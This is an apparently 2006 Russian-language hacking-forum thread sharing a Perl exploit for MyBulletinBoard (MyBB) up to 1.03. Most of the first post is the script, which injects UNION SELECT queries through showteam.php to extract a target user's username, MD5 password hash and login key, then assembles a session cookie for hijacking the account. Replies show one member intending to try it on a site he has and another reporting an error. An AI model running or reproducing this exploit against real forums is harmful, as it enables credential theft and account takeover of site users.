Форумы MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit

Discussion in 'Уязвимости CMS/форумов' started by +toxa+, 15 Feb 2006.

  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Чё-то это неделя выдалась урожайная на SQL inj сплойты для форумов..... теперь под прицелом оказался MyBulletinBoard <= 1.03

    Вот код сплойта

    Code:
    #!/bin/env perl
    #//-------------------------------------------------------------#
    #//     MyBB Forum SQL Injection Exploit .. By HACKERS PAL      #
    #//     Greets For Devil-00 - Abducter - Almaster - GaCkeR      #
    #//   Special Greets For SG (SecurityGurus) Team And Members    #
    #//                    http://WwW.SoQoR.NeT                     #
    #//-------------------------------------------------------------#
    
    use LWP::Simple;
    print "\n#####################################################";
    print "\n#        MyBB Forum Exploit By : HACKERS PAL        #";
    print "\n#               Http://WwW.SoQoR.NeT                #";
    if(!$ARGV[0] or !$ARGV[1]) {
    print "\n# -- Usage:                                         #";
    print "\n# -- perl $0 [Full-Path] [User ID]             #";
    print "\n# -- Example:                                       #";
    print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
       exit(0);
    }
    else
    {
    print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
    print "\n#####################################################";
           $web=$ARGV[0];
           $id=$ARGV[1];
    $url = "showteam.php?GLOBALS[]=1&comma=/*";
               $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/FROM (.*)users u WHERE/;
    $prefix=$1;
    if(!$1)
          {
    $prefix="mybb_";
          }
    $url =
    "showteam.php?GLOBALS[]=1&comma=-
    2)%20union%20select%20uid,username,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
               $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    print "\n[+] Connected to: $ARGV[0]\n";
    print "[+] User ID is : $id ";
    print "\n[+] Table Prefix is : $prefix";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
    print "\n[-] Unable to retrieve User Name\n" if(!$1);
    $url =
    "showteam.php?GLOBALS[]=1&comma=-
    2)%20union%20select%20uid,password,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
               $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
    die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
      print"\n[!] Watch out ... The Cookie Value is comming\n";
    $url =
    "showteam.php?GLOBALS[]=1&comma=-
    2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,1,4%20from%20".$prefix.
    "users%20where%20uid=$id/*";
               $site="$web/$url";
    $page = get($site) || die "[-] Unable to retrieve: $!";
    $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
    print "[-] Unable to retrieve Login Key\n" if(!$1);
    }
     
    _________________________
  2. Жора

    Жора New Member

    Joined:
    5 Feb 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    оу....буду проверять
    как раз есть где :)
     
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Пишет ошибку в сплойте
     
  4. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Ну че там с проверкой в итоге?